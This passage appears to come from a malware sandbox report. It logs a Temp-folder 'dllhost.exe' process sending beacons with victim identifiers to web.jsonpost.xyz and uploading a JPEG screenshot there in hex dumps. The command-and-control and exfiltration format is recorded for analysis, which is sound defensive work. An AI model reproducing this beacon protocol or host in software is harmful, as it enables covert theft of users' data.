                                                                                Nov 29, 2024 01:52:26.026918888 CET2472OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:52:26.026945114 CET2472OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:52:26.027029991 CET2472OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:52:26.027069092 CET2472OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:52:26.027143002 CET2472OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:52:26.027158022 CET2472OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                30192.168.2.44976672.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:26.062485933 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                31192.168.2.44976772.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:27.484153032 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                32192.168.2.44976872.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:27.529521942 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:27.529521942 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:27.529587030 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:27.529613018 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:27.649715900 CET2472OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:27.649736881 CET2472OUTData Raw: fa 13 57 d0 70 a5 49 47 1d c8 9e 8d 3b 9f 3d c4 f4 e3 2c 17 33 dd 34 73 54 51 45 7e 90 7e 7c 14 51 45 00 15 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 e7 b5 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 f3 f9 ef fc ba f5 7f 91 f5 fc 2d fc 3c 4f a4 7f
                                                                                Data Ascii: WpIG;=,34sTQE~~|QE__?#'__?#'-<O15_F+4VSNg9=m[HET#r5{CN%Oor/"y{F3K u%y{&3am#vsWFbkbU)#OH46I(
                                                                                Nov 29, 2024 01:52:27.649821043 CET4944OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:52:27.649888039 CET2472OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:52:27.649926901 CET2472OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:52:27.650063992 CET4944OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:52:27.650165081 CET3708OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                33192.168.2.44976972.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:28.908432961 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                34192.168.2.44977072.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:29.120588064 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:29.120625019 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:29.120682955 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:29.120707035 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:29.240792036 CET2472OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:29.240974903 CET7416OUTData Raw: fa 13 57 d0 70 a5 49 47 1d c8 9e 8d 3b 9f 3d c4 f4 e3 2c 17 33 dd 34 73 54 51 45 7e 90 7e 7c 14 51 45 00 15 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 e7 b5 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 f3 f9 ef fc ba f5 7f 91 f5 fc 2d fc 3c 4f a4 7f
                                                                                Data Ascii: WpIG;=,34sTQE~~|QE__?#'__?#'-<O15_F+4VSNg9=m[HET#r5{CN%Oor/"y{F3K u%y{&3am#vsWFbkbU)#OH46I(
                                                                                Nov 29, 2024 01:52:29.240998030 CET2472OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:52:29.241027117 CET2472OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:52:29.241084099 CET2472OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:52:29.241101027 CET2472OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P
                                                                                Nov 29, 2024 01:52:29.241189957 CET1236OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                35192.168.2.44977172.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:30.279799938 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                36192.168.2.44977272.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:30.622848988 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:30.623014927 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:30.623014927 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:30.623039007 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:30.743060112 CET4944OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:30.743096113 CET4944OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:52:30.743227959 CET2472OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:52:30.743244886 CET2472OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:52:30.743391991 CET4944OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:52:30.743454933 CET3708OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9
                                                                                Nov 29, 2024 01:52:30.863496065 CET7416OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                37192.168.2.44977372.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
